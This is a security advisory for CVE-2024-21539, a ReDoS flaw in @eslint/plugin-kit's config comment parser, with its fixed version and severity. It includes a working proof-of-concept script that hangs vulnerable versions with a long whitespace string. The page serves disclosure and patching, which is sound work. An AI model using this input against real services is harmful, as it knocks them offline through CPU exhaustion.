Security Advisories

CGA-v55f-9838-wrpj

Published

Last updated

https://images.chainguard.dev/security/CGA-v55f-9838-wrpj
Package

eslint

Latest Update
Fixed
Fixed Version

9.15.0-r0

Aliases
  • CVE-2024-21539
  • GHSA-7q7g-4xm8-89cq

Severity

3.5

Low

CVSS V3

Summary

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Description

Passing a very large, specially crafted string to the config comment parser causes excessive backtracking in a regular expression, which drives CPU usage up and hangs or crashes the program.

POC

// Proof of concept from the upstream advisory: a long run of whitespace
// followed by a single non-whitespace character triggers the ReDoS.
const { ConfigCommentParser } = require("@eslint/plugin-kit");

// Build the malicious input: one million spaces followed by "A".
let str = "";
for (let i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start");
const parser = new ConfigCommentParser();
// On vulnerable versions this call never returns.
console.log(parser.parseStringConfig(str, ""));
console.log("end");

// Run `npm i @eslint/plugin-kit` and `node attack.js`;
// the program then hangs indefinitely with high CPU usage.

References

Updates
